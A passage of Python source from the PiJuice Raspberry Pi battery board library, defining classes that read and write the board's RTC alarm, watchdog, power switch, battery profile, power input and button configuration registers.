ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
dci = d[0] | (d[1] << 8)
dc = float(dci) * 100 // 65534 if dci < 65535 else 100
return {'data': dc, 'error': 'NO_ERROR'}
class PiJuiceRtcAlarm(object):
RTC_ALARM_CMD = 0xB9
RTC_TIME_CMD = 0xB0
RTC_CTRL_STATUS_CMD = 0xC2
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def GetControlStatus(self):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
r = {}
if (d[0] & 0x01) and (d[0] & 0x04):
r['alarm_wakeup_enabled'] = True
else:
r['alarm_wakeup_enabled'] = False
if d[1] & 0x01:
r['alarm_flag'] = True
else:
r['alarm_flag'] = False
return {'data': r, 'error': 'NO_ERROR'}
def ClearAlarmFlag(self):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
if d[1] & 0x01:
d[1] = d[1] & 0xFE
return self.interface.WriteDataVerify(self.RTC_CTRL_STATUS_CMD, d)
else:
return {'error': 'NO_ERROR'}
def SetWakeupEnabled(self, status):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
if (d[0] & 0x01) and (d[0] & 0x04):
if status == True:
return {'error': 'NO_ERROR'}
else:
d[0] = d[0] & 0xFE
else:
if status == False:
return {'error': 'NO_ERROR'}
else:
d[0] = d[0] | 0x01 | 0x04
return self.interface.WriteDataVerify(self.RTC_CTRL_STATUS_CMD, d)
def GetTime(self):
ret = self.interface.ReadData(self.RTC_TIME_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
dt = {}
dt['second'] = ((d[0] >> 4) & 0x07) * 10 + (d[0] & 0x0F)
dt['minute'] = ((d[1] >> 4) & 0x07) * 10 + (d[1] & 0x0F)
if (d[2] & 0x40):
# hourFormat = '12'
ampm = 'PM' if (d[2] & 0x20) else 'AM'
dt['hour'] = str(((d[2] >> 4) & 0x01) * 10 + (d[2] & 0x0F)) + ' ' + ampm
else:
# hourFormat = '24'
dt['hour'] = ((d[2] >> 4) & 0x03) * 10 + (d[2] & 0x0F)
dt['weekday'] = d[3] & 0x07
dt['day'] = ((d[4] >> 4) & 0x03) * 10 + (d[4] & 0x0F)
dt['month'] = ((d[5] >> 4) & 0x01) * 10 + (d[5] & 0x0F)
dt['year'] = ((d[6] >> 4) & 0x0F) * 10 + (d[6] & 0x0F) + 2000
dt['subsecond'] = d[7] // 256
if (d[8] & 0x03) == 2:
dt['daylightsaving'] = 'SUB1H'
elif (d[8] & 0x03) == 1:
dt['daylightsaving'] = 'ADD1H'
else:
dt['daylightsaving'] = 'NONE'
if d[8] & 0x04:
dt['storeoperation'] = True
else:
dt['storeoperation'] = False
return {'data': dt, 'error': 'NO_ERROR'}
def SetTime(self, dateTime):
d = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
if dateTime == None or dateTime == {}:
dt = {}
else:
dt = dateTime
if 'second' in dt:
try:
s = int(dt['second'])
except:
return {'error': 'INVALID_SECOND'}
if s < 0 or s > 60:
return {'error': 'INVALID_SECOND'}
d[0] = ((s // 10) & 0x0F) << 4
d[0] = d[0] | ((s % 10) & 0x0F)
if 'minute' in dt:
try:
m = int(dt['minute'])
except:
return {'error': 'INVALID_MINUTE'}
if m < 0 or m > 60:
return {'error': 'INVALID_MINUTE'}
d[1] = ((m // 10) & 0x0F) << 4
d[1] = d[1] | ((m % 10) & 0x0F)
if 'hour' in dt:
try:
h = dt['hour']
if isinstance(h, str):
if (h.find('AM') > -1) or (h.find('PM') > -1):
if (h.find('PM') > -1):
hi = int(h.split('PM')[0])
if hi < 1 or hi > 12:
return {'error': 'INVALID_HOUR'}
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x20 | 0x40
else:
hi = int(h.split('AM')[0])
if hi < 1 or hi > 12:
return {'error': 'INVALID_HOUR'}
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x40
else:
h = int(h)
if h < 0 or h > 23:
return {'error': 'INVALID_HOUR'}
d[2] = (((h // 10) & 0x03) << 4)
d[2] = d[2] | ((h % 10) & 0x0F)
elif isinstance(h, int):
#assume 24 hour format
if h < 0 or h > 23:
return {'error': 'INVALID_HOUR'}
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
except:
return {'error': 'INVALID_HOUR'}
if 'weekday' in dt:
try:
day = int(dt['weekday'])
except:
return {'error': 'INVALID_WEEKDAY'}
if day < 1 or day > 7:
return {'error': 'INVALID_WEEKDAY'}
d[3] = day & 0x07
if 'day' in dt:
try:
da = int(dt['day'])
except:
return {'error': 'INVALID_DAY'}
if da < 1 or da > 31:
return {'error': 'INVALID_DAY'}
d[4] = ((da // 10) & 0x03) << 4
d[4] = d[4] | ((da % 10) & 0x0F)
if 'month' in dt:
try:
m = int(dt['month'])
except:
return {'error': 'INVALID_MONTH'}
if m < 1 or m > 12:
return {'error': 'INVALID_MONTH'}
d[5] = ((m // 10) & 0x01) << 4
d[5] = d[5] | ((m % 10) & 0x0F)
if 'year' in dt:
try:
y = int(dt['year']) - 2000
except:
return {'error': 'INVALID_YEAR'}
if y < 0 or y > 99:
return {'error': 'INVALID_YEAR'}
d[6] = ((y // 10) & 0x0F) << 4
d[6] = d[6] | ((y % 10) & 0x0F)
if 'subsecond' in dt:
try:
s = int(dt['subsecond']) * 256
except:
return {'error': 'INVALID_SUBSECOND'}
if s < 0 or s > 255:
return {'error': 'INVALID_SUBSECOND'}
d[7] = s
if 'daylightsaving' in dt:
if dt['daylightsaving'] == 'SUB1H':
d[8] |= 2
elif dt['daylightsaving'] == 'ADD1H':
d[8] |= 1
if 'storeoperation' in dt and dt['storeoperation'] == True:
d[8] |= 0x04
ret = self.interface.WriteData(self.RTC_TIME_CMD, d)
if ret['error'] != 'NO_ERROR':
return ret
# verify
time.sleep(0.2)
ret = self.interface.ReadData(self.RTC_TIME_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
if abs(ret['data'][0] - d[0]) < 2:
ret['data'][0] = d[0]
ret['data'][7] = d[7]
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
else:
return {'error': 'WRITE_FAILED'}
def GetAlarm(self):
ret = self.interface.ReadData(self.RTC_ALARM_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
alarm = {}
if (d[0] & 0x80) == 0x00:
alarm['second'] = ((d[0] >> 4) & 0x07) * 10 + (d[0] & 0x0F)
if (d[1] & 0x80) == 0x00:
alarm['minute'] = ((d[1] >> 4) & 0x07) * 10 + (d[1] & 0x0F)
else:
alarm['minute_period'] = d[7]
if (d[2] & 0x80) == 0x00:
if (d[2] & 0x40):
# hourFormat = '12'
ampm = 'PM' if (d[2] & 0x20) else 'AM'
alarm['hour'] = str(((d[2] >> 4) & 0x01) * 10 + (d[2] & 0x0F)) + ' ' + ampm
else:
# hourFormat = '24'
alarm['hour'] = ((d[2] >> 4) & 0x03) * 10 + (d[2] & 0x0F)
else:
if d[4] == 0xFF and d[5] == 0xFF and d[6] == 0xFF:
alarm['hour'] = 'EVERY_HOUR'
else:
h = ''
n = 0
for i in range(0, 3):
for j in range(0, 8):
if d[i+4] & ((0x01 << j) & 0xFF):
if (d[2] & 0x40):
if (i*8+j) == 0:
h12 = '12AM'
elif (i*8+j) == 12:
h12 = '12PM'
else:
h12 = (str(i*8+j+1)+'AM') if ((i*8+j) < 12) else (str(i*8+j-11)+'PM')
h = (h + ';') if n > 0 else h
h = h + h12
else:
h = (h + ';') if n > 0 else h
h = h + str(i*8+j)
n = n + 1
alarm['hour'] = h
if (d[3] & 0x40):
if (d[3] & 0x80) == 0x00:
alarm['weekday'] = d[3] & 0x07
else:
if d[8] == 0xFF:
alarm['weekday'] = 'EVERY_DAY'
else:
day = ''
n = 0
for j in range(1, 8):
if d[8] & ((0x01 << j) & 0xFF):
day = (day + ';') if n > 0 else day
day = day + str(j)
n = n + 1
alarm['weekday'] = day
else:
if (d[3] & 0x80) == 0x00:
alarm['day'] = ((d[3] >> 4) & 0x03) * 10 + (d[3] & 0x0F)
else:
alarm['day'] = 'EVERY_DAY'
return {'data': alarm, 'error': 'NO_ERROR'}
def SetAlarm(self, alarm):
d = [0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF]
if alarm == None or alarm == {}:
#disable alarm
return self.interface.WriteDataVerify(self.RTC_ALARM_CMD, d, 0.2)
if 'second' in alarm:
try:
s = int(alarm['second'])
except:
return {'error': 'INVALID_SECOND'}
if s < 0 or s > 60:
return {'error': 'INVALID_SECOND'}
d[0] = ((s // 10) & 0x0F) << 4
d[0] = d[0] | ((s % 10) & 0x0F)
if 'minute' in alarm:
try:
m = int(alarm['minute'])
except:
return {'error': 'INVALID_MINUTE'}
if m < 0 or m > 60:
return {'error': 'INVALID_MINUTE'}
d[1] = ((m // 10) & 0x0F) << 4
d[1] = d[1] | ((m % 10) & 0x0F)
else:
d[1] = d[1] | 0x80 # every minute
#d[1] = d[1] | (0x80 if alarm['mask']['minutes'] else 0x00)
if 'minute_period' in alarm:
d[1] = d[1] | 0x80
try:
s = int(alarm['minute_period'])
except:
return {'error': 'INVALID_MINUTE_PERIOD'}
if s < 1 or s > 60:
return {'error': 'INVALID_MINUTE_PERIOD'}
d[7] = s
d[4] = 0xFF
d[5] = 0xFF
d[6] = 0xFF
if 'hour' in alarm:
try:
h = alarm['hour']
if h == 'EVERY_HOUR':
d[2] = 0x80
elif isinstance(h, str) and h.find(';') < 0:
if (h.find('AM') > -1) or (h.find('PM') > -1):
if (h.find('PM') > -1):
hi = int(h.split('PM')[0])
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x20 | 0x40
else:
hi = int(h.split('AM')[0])
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x40
else:
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
elif isinstance(h, int):
#assume 24 hour format
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
elif (isinstance(h, str) and h.find(';') >= 0):
hs = 0x00000000
# hFormat = ''
hl = h.split(';')
# remove ending empty string if there is ; at the end of list
hl = hl[0:-1] if (not bool(hl[-1].strip())) else hl
for i in hl:
if (i.find('AM') > -1) or (i.find('PM') > -1):
if i.find('AM') > -1:
ham = int(i.split('AM')[0])
if ham < 12:
hs = hs | (0x00000001 << (ham))
else:
hs = hs | 0x00000001
else:
hpm = int(i.split('PM')[0])
if hpm < 12:
hs = hs | (0x00000001 << (hpm+12))
else:
hs = hs | (0x00000001 << (12))
else:
hs = hs | (0x00000001 << int(i))
#d[2] = d[2] | (0x40 if hFormat == '12' else 0x00)
d[2] = 0x80
d[4] = hs & 0x000000FF
hs = hs >> 8
d[5] = hs & 0x000000FF
hs = hs >> 8
d[6] = hs & 0x000000FF
except:
return {'error': 'INVALID_HOUR'}
else:
d[2] = 0x80 # every hour
d[8] = 0xFF
if 'weekday' in alarm:
try:
day = alarm['weekday']
if day == 'EVERY_DAY':
d[3] = 0x80 | 0x40
elif isinstance(day, str) and day.find(';') < 0:
dw = int(day)
d[3] = d[3] | (dw & 0x0F) | 0x40
elif isinstance(day, int):
dw = int(day)
d[3] = d[3] | (dw & 0x0F) | 0x40
elif (isinstance(day, str) and day.find(';') >= 0):
d[3] = 0x40 | 0x80
ds = 0x00
dl = day.split(';')
dl = dl[0:-1] if (not bool(dl[-1].strip())) else dl
for i in dl:
ds = ds | (0x01 << int(i))
d[8] = ds
except:
return {'error': 'INVALID_WEEKDAY'}
elif 'day' in alarm:
try:
day = alarm['day']
if day == 'EVERY_DAY':
d[3] = 0x80
else:
dm = int(day)
d[3] = (((dm // 10) & 0x03) << 4)
d[3] = d[3] | ((dm % 10) & 0x0F)
except:
return {'error': 'INVALID_DAY_OF_MONTH'}
else:
d[3] = 0x80 # every day
ret = self.interface.WriteData(self.RTC_ALARM_CMD, d)
if ret['error'] != 'NO_ERROR':
return ret
# verify
time.sleep(0.2)
ret = self.interface.ReadData(self.RTC_ALARM_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
h1 = d[2]
h2 = ret['data'][2]
if (h1 & 0x40): # convert to 24 hour format
h1Bin = ((h1 >> 4) & 0x01) * 10 + (h1 & 0x0F)
h1Bin = h1Bin if h1Bin < 12 else 0
h1Bin = h1Bin + (12 if h1 & 0x20 else 0)
else:
h1Bin = ((h1 >> 4) & 0x03) * 10 + (h1 & 0x0F)
if (h2 & 0x40): # convert to 24 hour format
h2Bin = ((h2 >> 4) & 0x01) * 10 + (h2 & 0x0F)
h2Bin = h2Bin if h2Bin < 12 else 0
h2Bin = h2Bin + (12 if h2 & 0x20 else 0)
else:
h2Bin = ((h2 >> 4) & 0x03) * 10 + (h2 & 0x0F)
d[2] = h1Bin | (d[2] & 0x80)
ret['data'][2] = h2Bin | (ret['data'][2] & 0x80)
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
class PiJuicePower(object):
WATCHDOG_ACTIVATION_CMD = 0x61
POWER_OFF_CMD = 0x62
WAKEUP_ON_CHARGE_CMD = 0x63
SYSTEM_POWER_SWITCH_CTRL_CMD = 0x64
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def SetPowerOff(self, delay):
return self.interface.WriteData(self.POWER_OFF_CMD, [delay])
def GetPowerOff(self):
return self.interface.ReadData(self.POWER_OFF_CMD, 1)
def SetWakeUpOnCharge(self, arg, non_volatile = False):
try:
nv = 0x80 if non_volatile == True else 0x00
if arg == 'DISABLED':
d = nv | 0x7F
elif int(arg) >= 0 and int(arg) <= 100:
d = nv | int(arg)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.WAKEUP_ON_CHARGE_CMD, [d])
def GetWakeUpOnCharge(self):
ret = self.interface.ReadData(self.WAKEUP_ON_CHARGE_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data'][0]
if d&0x7F == 0x7F:
return {'data': 'DISABLED', 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
else:
return {'data': d&0x7F, 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
# input argument 1 - 65535 minutes activates watchdog, 0 disables watchdog
def SetWatchdog(self, minutes, non_volatile = False):
try:
nv = 0x8000 if non_volatile == True else 0x0000
d = int(minutes) & 0xFFFF
if d >= 0x4000: d = (d >> 2) | 0x4000 #correct resolution
d = d | nv
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.WATCHDOG_ACTIVATION_CMD, [d & 0xFF, (d >> 8) & 0xFF])
def GetWatchdog(self):
ret = self.interface.ReadData(self.WATCHDOG_ACTIVATION_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
cfg = (d[1] << 8) | d[0]
minutes = cfg & 0x3FFF
minutes = minutes << ((cfg&0x4000) >> 13) #correct resolution for range 16384-65536
return {'data': minutes, 'non_volatile': bool(cfg & 0x8000), 'error': 'NO_ERROR'}
def SetSystemPowerSwitch(self, state):
try:
d = int(state) // 100
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.SYSTEM_POWER_SWITCH_CTRL_CMD, [d])
def GetSystemPowerSwitch(self):
ret = self.interface.ReadData(self.SYSTEM_POWER_SWITCH_CTRL_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': ret['data'][0] * 100, 'error': 'NO_ERROR'}
class PiJuiceConfig(object):
CHARGING_CONFIG_CMD = 0x51
BATTERY_PROFILE_ID_CMD = 0x52
BATTERY_PROFILE_CMD = 0x53
BATTERY_EXT_PROFILE_CMD = 0x54
BATTERY_TEMP_SENSE_CONFIG_CMD = 0x5D
POWER_INPUTS_CONFIG_CMD = 0x5E
RUN_PIN_CONFIG_CMD = 0x5F
POWER_REGULATOR_CONFIG_CMD = 0x60
LED_CONFIGURATION_CMD = 0x6A
BUTTON_CONFIGURATION_CMD = 0x6E
IO_CONFIGURATION_CMD = 0x72
I2C_ADDRESS_CMD = 0x7C
ID_EEPROM_WRITE_PROTECT_CTRL_CMD = 0x7E
ID_EEPROM_ADDRESS_CMD = 0x7F
RESET_TO_DEFAULT_CMD = 0xF0
FIRMWARE_VERSION_CMD = 0xFD
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def SetChargingConfig(self, config, non_volatile = False):
try:
nv = 0x80 if non_volatile == True else 0x00
if config == True or config == False:
config = {'charging_enabled': config}
if config['charging_enabled'] == True:
chEn = 0x01
elif config['charging_enabled'] == False:
chEn = 0x00
else:
return {'error': 'BAD_ARGUMENT'}
except:
return {'error': 'BAD_ARGUMENT'}
d = [nv | chEn]
ret = self.interface.WriteDataVerify(self.CHARGING_CONFIG_CMD, d)
if non_volatile == False and ret['error'] == 'WRITE_FAILED':
# 'WRITE_FAILED' error when config corresponds to what is stored in EEPROM
# and non_volatile argument is False
ret['error'] = 'NO_ERROR'
return ret
def GetChargingConfig(self):
ret = self.interface.ReadData(self.CHARGING_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': {'charging_enabled' :bool(ret['data'][0] & 0x01)},
'non_volatile':bool(ret['data'][0]&0x80), 'error':'NO_ERROR'}
batteryProfiles = ['PJZERO_1000', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'BP6X_1400', 'PJLIPO_600', 'PJLIPO_500', 'PJLIPO_2500']
def SelectBatteryProfiles(self, fwver):
if fwver >= 0x15:
self.batteryProfiles = self.batteryProfiles
elif fwver >= 0x14:
self.batteryProfiles = ['PJZERO_1000', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'BP6X_1400', 'PJLIPO_600', 'PJLIPO_500']
elif fwver == 0x13:
self.batteryProfiles = ['BP6X_1400', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'PJZERO_1000', 'PJLIPO_600', 'PJLIPO_500']
else:
self.batteryProfiles = ['BP6X', 'BP7X', 'SNN5843', 'LIPO8047109']
def SetBatteryProfile(self, profile):
id = None
if profile == 'DEFAULT':
id = 0xFF
elif profile == 'CUSTOM':
id = 0x0F
else:
try:
id = self.batteryProfiles.index(profile)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.BATTERY_PROFILE_ID_CMD, [id])
batteryProfileSources = ['HOST', 'DIP_SWITCH', 'RESISTOR']
batteryProfileValidity = ['VALID', 'INVALID']
def GetBatteryProfileStatus(self):
ret = self.interface.ReadData(self.BATTERY_PROFILE_ID_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
id = ret['data'][0]
if id == 0xF0:
return {'data': {'validity': 'DATA_WRITE_NOT_COMPLETED'}, 'error': 'NO_ERROR'}
origin = 'CUSTOM' if (id & 0x0F) == 0x0F else 'PREDEFINED'
source = self.batteryProfileSources[(id >> 4) & 0x03]
validity = self.batteryProfileValidity[(id >> 6) & 0x01]
profile = None
try:
profile = self.batteryProfiles[(id & 0x0F)]
except:
profile = 'UNKNOWN'
return {'data': {'validity': validity, 'source': source, 'origin': origin, 'profile': profile}, 'error': 'NO_ERROR'}
def GetBatteryProfile(self):
ret = self.interface.ReadData(self.BATTERY_PROFILE_CMD, 14)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
if all(v == 0 for v in d):
return {'data': 'INVALID', 'error': 'NO_ERROR'}
profile = {}
packed_u16 = (d[1] << 8) | d[0]
profile['capacity'] = 0xFFFFFFFF if (packed_u16==0xFFFF) else (packed_u16&0x7FFF) << (((packed_u16&0x8000) >> 15)*7)
profile['chargeCurrent'] = d[2] * 75 + 550
profile['terminationCurrent'] = d[3] * 50 + 50
profile['regulationVoltage'] = d[4] * 20 + 3500
profile['cutoffVoltage'] = d[5] * 20
profile['tempCold'] = ctypes.c_byte(d[6]).value
profile['tempCool'] = ctypes.c_byte(d[7]).value
profile['tempWarm'] = ctypes.c_byte(d[8]).value
profile['tempHot'] = ctypes.c_byte(d[9]).value
profile['ntcB'] = (d[11] << 8) | d[10]
profile['ntcResistance'] = ((d[13] << 8) | d[12]) * 10
return {'data': profile, 'error': 'NO_ERROR'}
def SetCustomBatteryProfile(self, profile):
d = [0x00] * 14
try:
cap = profile['capacity']
if (cap==0xFFFFFFFF):
packed_u16 = 0xFFFF
else:
c = 4194175 if (cap > 4194175) else cap
packed_u16 = (c >> (int(c>=0x8000)*7)) | int(c>=0x8000)*0x8000 # correction for large capacities over 32767
d[0] = packed_u16 & 0xFF
d[1] = (packed_u16 >> 8) & 0xFF
d[2] = int(round((profile['chargeCurrent'] - 550) // 75))
d[3] = int(round((profile['terminationCurrent'] - 50) // 50))
d[4] = int(round((profile['regulationVoltage'] - 3500) // 20))
d[5] = int(round(profile['cutoffVoltage'] // 20))
d[6] = ctypes.c_ubyte(profile['tempCold']).value
d[7] = ctypes.c_ubyte(profile['tempCool']).value
d[8] = ctypes.c_ubyte(profile['tempWarm']).value
d[9] = ctypes.c_ubyte(profile['tempHot']).value
B = profile['ntcB']
d[10] = B & 0xFF
d[11] = (B >> 8) & 0xFF
R = profile['ntcResistance'] // 10
d[12] = R & 0xFF
d[13] = (R >> 8) & 0xFF
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.BATTERY_PROFILE_CMD, d, 0.2)
batteryChemistries = ['LIPO', 'LIFEPO4']
def GetBatteryExtProfile(self):
ret = self.interface.ReadData(self.BATTERY_EXT_PROFILE_CMD, 17)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
if all(v == 0 for v in d):
return {'data':'INVALID', 'error':'NO_ERROR'}
profile = {}
if d[0] < len(self.batteryChemistries):
profile['chemistry'] = self.batteryChemistries[d[0]]
else:
profile['chemistry'] = 'UNKNOWN'
profile['ocv10'] = (d[2] << 8) | d[1]
profile['ocv50'] = (d[4] << 8) | d[3]
profile['ocv90'] = (d[6] << 8) | d[5]
profile['r10'] = ((d[8] << 8) | d[7])/100.0
profile['r50'] = ((d[10] << 8) | d[9])/100.0
profile['r90'] = ((d[12] << 8) | d[11])/100.0
return {'data':profile, 'error':'NO_ERROR'}
def SetCustomBatteryExtProfile(self, profile):
d = [0x00] * 17
try:
chid = self.batteryChemistries.index(profile['chemistry'])
d[0] = chid&0xFF
v=int(profile['ocv10'])
d[1] = v&0xFF
d[2] = (v >> 8)&0xFF
v=int(profile['ocv50'])
d[3] = v&0xFF
d[4] = (v >> 8)&0xFF
v=int(profile['ocv90'])
d[5] = v&0xFF
d[6] = (v >> 8)&0xFF
v=int(profile['r10']*100)
d[7] = v&0xFF
d[8] = (v >> 8)&0xFF
v=int(profile['r50']*100)
d[9] = v&0xFF
d[10] = (v >> 8)&0xFF
v=int(profile['r90']*100)
d[11] = v&0xFF
d[12] = (v >> 8)&0xFF
d[13] = 0xFF
d[14] = 0xFF
d[15] = 0xFF
d[16] = 0xFF
except:
return {'error':'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.BATTERY_EXT_PROFILE_CMD, d, 0.2)
batteryTempSenseOptions = ['NOT_USED', 'NTC', 'ON_BOARD', 'AUTO_DETECT']
def GetBatteryTempSenseConfig(self):
result = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if (d[0]&0x07) < len(self.batteryTempSenseOptions):
return {'data': self.batteryTempSenseOptions[d[0]&0x07], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetBatteryTempSenseConfig(self, config):
ret = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
ind = self.batteryTempSenseOptions.index(config)
if ind == None:
return {'error': 'BAD_ARGUMENT'}
data = [int(ret['data'][0]&(~0x07) | ind)]
return self.interface.WriteDataVerify(self.BATTERY_TEMP_SENSE_CONFIG_CMD, data)
rsocEstimationOptions = ['AUTO_DETECT', 'DIRECT_BY_MCU']
def GetRsocEstimationConfig(self):
result = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if ((d[0]&0x30)>>4) < len(self.rsocEstimationOptions):
return {'data':self.rsocEstimationOptions[(d[0]&0x30)>>4], 'error':'NO_ERROR'}
else:
return {'error':'UNKNOWN_DATA'}
def SetRsocEstimationConfig(self, config):
ret = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
ind = self.rsocEstimationOptions.index(config)
if ind == None:
return {'error':'BAD_ARGUMENT'}
data = [(int(ret['data'][0])&(~0x30)) | (ind<<4)]
return self.interface.WriteDataVerify(self.BATTERY_TEMP_SENSE_CONFIG_CMD, data)
powerInputs = ['USB_MICRO', '5V_GPIO']
usbMicroCurrentLimits = ['1.5A', '2.5A']
usbMicroDPMs = list("{0:.2f}".format(4.2+0.08*x)+'V' for x in range(0, 8))
def SetPowerInputsConfig(self, config, non_volatile=False):
d = []
try:
nv = 0x80 if non_volatile == True else 0x00
prec = 0x01 if (config['precedence'] == '5V_GPIO') else 0x00
gpioInEn = 0x02 if (config['gpio_in_enabled'] == True) else 0x00
noBatOn = 0x04 if (config['no_battery_turn_on'] == True) else 0x00
ind = self.usbMicroCurrentLimits.index(config['usb_micro_current_limit'])
if ind == None:
return {'error': 'INVALID_USB_MICRO_CURRENT_LIMIT'}
usbMicroLimit = int(ind) << 3
ind = self.usbMicroDPMs.index(config['usb_micro_dpm'])
if ind == None:
return {'error': 'INVALID_USB_MICRO_DPM'}
dpm = (int(ind) & 0x07) << 4
d = [nv | prec | gpioInEn | noBatOn | usbMicroLimit | dpm]
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.POWER_INPUTS_CONFIG_CMD, d)
def GetPowerInputsConfig(self):
ret = self.interface.ReadData(self.POWER_INPUTS_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data'][0]
config = {}
config['precedence'] = self.powerInputs[d & 0x01]
config['gpio_in_enabled'] = bool(d & 0x02)
config['no_battery_turn_on'] = bool(d & 0x04)
config['usb_micro_current_limit'] = self.usbMicroCurrentLimits[(
d >> 3) & 0x01]
config['usb_micro_dpm'] = self.usbMicroDPMs[(d >> 4) & 0x07]
return {'data': config, 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
buttons = ['SW' + str(i+1) for i in range(0, 3)]
buttonEvents = ['PRESS', 'RELEASE', 'SINGLE_PRESS',
'DOUBLE_PRESS', 'LONG_PRESS1', 'LONG_PRESS2']
def GetButtonConfiguration(self, button):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
result = self.interface.ReadData(self.BUTTON_CONFIGURATION_CMD + b, 12)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
config = {}
for i in range(0, len(self.buttonEvents)):
config[self.buttonEvents[i]] = {}
try:
if d[i*2] == 0:
config[self.buttonEvents[i]]['function'] = 'NO_FUNC'
elif d[i*2] & 0xF0 == 0:
config[self.buttonEvents[i]]['function'] = pijuice_hard_functions[(d[i*2] & 0x0F)-1]
elif d[i*2] & 0xF0 == 0x10:
config[self.buttonEvents[i]]['function'] = pijuice_sys_functions[(d[i*2] & 0x0F)-1]
elif d[i*2] & 0xF0 == 0x20:
config[self.buttonEvents[i]]['function'] = pijuice_user_functions[d[i*2] & 0x0F]
else:
config[self.buttonEvents[i]]['function'] = 'UNKNOWN'
except IndexError:
config[self.buttonEvents[i]]['function'] = 'UNKNOWN'
config[self.buttonEvents[i]]['parameter'] = d[i*2+1] * 100
return {'data': config, 'error': 'NO_ERROR'}
def SetButtonConfiguration(self, button, config):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
data = [0x00] * (len(self.buttonEvents) * 2)
for i in range(0, len(self.buttonEvents)):
try:
data[i*2] = pijuice_hard_functions.index(
config[self.buttonEvents[i]]['function']) + 0x01
except ValueError:
try:
data[i*2] = pijuice_sys_functions.index(
config[self.buttonEvents[i]]['function']) + 0x11
except:
try:
data[i*2] = pijuice_user_functions.index(
config[self.buttonEvents[i]]['function']) + 0x20
except:
